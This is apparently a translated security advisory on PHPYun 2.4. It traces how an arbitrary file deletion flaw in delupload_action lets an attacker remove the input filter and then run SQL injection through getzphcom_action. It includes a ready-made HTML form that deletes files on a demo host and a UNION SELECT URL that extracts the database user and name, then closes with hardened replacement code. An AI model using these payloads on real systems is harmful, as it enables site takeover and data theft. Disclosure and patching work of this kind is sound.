PHPYun (PHP Cloud Talent System) is a product of bkJia. Source code download: http://www.phpyun.com/phpyun_2.4_GBK_Beta.zip (version 2.4).

First look at the index.php file in the root directory:

```php
<?php
include(dirname(__FILE__) . "/global.php");
// ... omitted ...
$act  = $_GET['act'];
$task = $_GET['task'];
// ... omitted ...
require(MODEL_PATH . 'class/common.php');
require("model/" . $act . '.class.php');   // includes the class file under model/
$conclass = $act . '_controller';
$actfunc  = $task . '_action';
$views = new $conclass($phpyun, $db, $db_config["def"], "index");   // instantiate the controller class
if (!method_exists($views, $actfunc)) {
    $views->DoException();
}
$views->$actfunc();
// Requesting index.php?act=ajax&task=delupload calls the delupload_action() method
// of the ajax_controller class in model/ajax.class.php
?>
```

Now global.php in the root directory:

```php
error_reporting(0);   // error display is disabled
// ...
if ($_GET[act] != "admin_template") {
    include(CONFIG_PATH . "db.safety.php");   // includes the data/db.safety.php file
}
```

Then look at data/db.safety.php:

```php
<?php
function quotesGPC() {
    $_POST   = array_map("addSlash", $_POST);
    $_GET    = array_map("addSlash", $_GET);
    $_COOKIE = array_map("addSlash", $_COOKIE);
}

function addSlash($el) {
    if (is_array($el))
        return array_map("addSlash", $el);
    else
        return addslashes($el);
}

function gpc2sql($str) {
    $arr = array("and" => "an d", "or" => "Or", "%20" => "", "select" => "Select",
                 "update" => "Update", "count" => "Count", "chr" => "Chr",
                 "truncate" => "Truncate", "union" => "Union", "delete" => "Delete",
                 "insert" => "Insert");
    foreach ($arr as $key => $v) {
        $str = preg_replace('/' . $key . '/isu', $v, $str);
    }
    return $str;
}

function common_htmlspecialchars($str) {
    $str = preg_replace('/&(?!#[0-9]+;)/s', '&amp;', $str);
    $str = str_replace(array('&', '<', '>', '"', 'and', "'"),
                       array("&amp;", '&lt;', '&gt;', '&quot;', 'an d', "&acute;"), $str);
    return gpc2sql($str);
}

foreach ($_POST as $id => $v) {
    $_POST[$id] = common_htmlspecialchars($v);
}
foreach ($_GET as $id => $v) {
    if (!is_array($v)) $v = substr(strip_tags($v), 0, 80);
    $_GET[$id] = common_htmlspecialchars($v);
}
foreach ($_COOKIE as $id => $v) {
    // the length arguments were lost in the page's extract; 0, 80 is assumed to match the $_GET loop
    $v = substr(strip_tags($v), 0, 80);
    $_COOKIE[$id] = common_htmlspecialchars($v);
}
?>
```

We can see that the values of $_POST, $_GET and $_COOKIE are filtered and escaped, which makes XSS and SQL injection difficult. The problem lies in model/ajax.class.php. Let's look at the delupload_action function:

```php
function delupload_action() {
    if (!$this->uid || !$this->username || $_COOKIE["usertype"] != 2) {
        // an enterprise user (usertype 2) must be logged in; an individual user would have to modify the cookie
        echo 0;
        die;
    } else {
        $dir = $_POST[str][0];       // the value of str[0] in the POST form: any file path can be supplied
        echo @unlink("." . $dir);    // unlink() deletes the file
    }
}
```

Construct an HTML file:

```html
<form action="http://demo.phpyun.com/index.php?act=ajax&task=delupload" method="post">
<br>file to be deleted: <input type="text" name="str[0]" value="/robots.txt" size=120>
<br><input type="submit" value="submit">
</form>
```

After submission, the robots.txt file is deleted.

If /data/phpyun.lock is deleted, the system can be reinstalled. If /data/db.safety.php is deleted, $_POST, $_GET and $_COOKIE are no longer filtered. For example, after deleting /data/db.safety.php, the getzphcom_action function in model/ajax.class.php can be used for SQL injection:

```php
function getzphcom_action() {
    extract($_GET);   // $jobid = $_GET["jobid"]
    if (!$jobid) {
        $arr['status']  = 0;
        $arr['content'] = iconv("gbk", "UTF-8", "You have no position yet, <a href='index.php?act=login&usertype=2'>log on first</a>");
    } else {
        $row = $this->obj->DB_select_all("company_job", "`id` in ($jobid)");   // $jobid is injectable
        foreach ($row as $v) {
            $data .= $v[name] . '<br>';
        }
        $arr['status']  = 1;
        $arr['content'] = iconv("gbk", "UTF-8", $data);
    }
    echo json_encode($arr);
}
```

Injection: access /index.php?act=ajax&task=getzphcom&jobid=-1) union select 1,2,concat(user(),0x7c,database()),4,5,6,7,8,9,10,11,12,13,[...],30%23 (the middle of the column list is missing from the page). The injection test succeeds locally; the injection test fails against demo.phpyun.com.
Solution:
Only allow users to delete specific files uploaded by users.
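One way to apply that fix to both handlers, as an added example that is not PHPYun's own code: deletion is confined to the logged-in user's own upload folder via realpath(), and job ids are reduced to a comma-separated list of integers before they reach the `id` in (...) clause. UPLOAD_ROOT, the per-user folder layout and the function names are assumptions.

```php
<?php
// Added example, not from PHPYun. UPLOAD_ROOT is an assumed constant naming the
// directory that holds one sub-folder per user id; $uid is the authenticated user.
define('UPLOAD_ROOT', __DIR__ . '/data/upload');

/**
 * Return the canonical path of $requested only if it is an existing file inside
 * the caller's own upload folder; otherwise return false.
 */
function resolve_user_upload($uid, $requested)
{
    $userDir = realpath(UPLOAD_ROOT . '/' . (int)$uid);
    if ($userDir === false) {
        return false;   // the user has no upload folder, so nothing may be deleted
    }
    // Only the file name part is used, which discards "../" segments and absolute paths.
    $name = basename((string)$requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return false;
    }
    $target = realpath($userDir . '/' . $name);
    // realpath() is false for missing files and collapses symlinks, so a prefix
    // check on the canonical path reliably keeps the target inside $userDir.
    if ($target === false || strpos($target, $userDir . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return is_file($target) ? $target : false;
}

/** Hardened delupload: delete only a file that resolve_user_upload() approved. */
function delupload_hardened($uid, $requested)
{
    $target = resolve_user_upload($uid, $requested);
    return $target !== false && unlink($target);
}

/**
 * Hardened getzphcom input handling: "12,13,abc) union select 1" becomes "12,13",
 * so the value interpolated into "`id` in (...)" is only ever a list of integers.
 * An empty result means "no valid ids" and the caller should skip the query.
 */
function sanitize_jobids($jobid)
{
    $ids = array();
    foreach (explode(',', (string)$jobid) as $part) {
        $part = trim($part);
        if ($part !== '' && ctype_digit($part)) {
            $ids[] = (int)$part;
        }
    }
    return implode(',', array_unique($ids));
}
```

The deletion check also depends on the usertype test being replaced by a server-side role lookup, since the original trusts $_COOKIE["usertype"], which the client controls.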